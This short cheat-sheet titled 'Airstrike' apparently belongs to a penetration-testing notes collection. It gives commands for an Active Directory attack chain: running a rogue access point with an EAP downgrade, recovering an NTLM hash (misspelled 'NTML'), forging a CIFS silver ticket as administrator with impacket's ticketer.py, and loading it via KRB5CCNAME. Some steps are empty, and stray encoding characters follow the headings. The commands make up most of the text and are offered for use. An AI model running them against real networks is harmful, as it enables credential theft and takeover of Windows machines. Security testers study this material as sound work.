Airstrike
Exploitation stepsâ
Step 1 - Access Pointâ
python3 trap -i <ap_interface> -u <upstream_interface> -e <ESSID> -c <channel> -b <AP_BSSID> --eap --downgrade <weakest|balanced>
Step 2 - Recovering the NTML hashâ
Step 3 - Forge a silver ticket for the CIFS service on the deviceâ
ticketer.py -nthash <NTLM> -domain-sid <domain_SID> -domain <fqdn_domain> -spn cifs/<fqdn_computer_name> administrator
export KRB5CCNAME=administrator.ccache
Step 4 - Post-Exploitationâ
Make a Silver ticket with impacket
.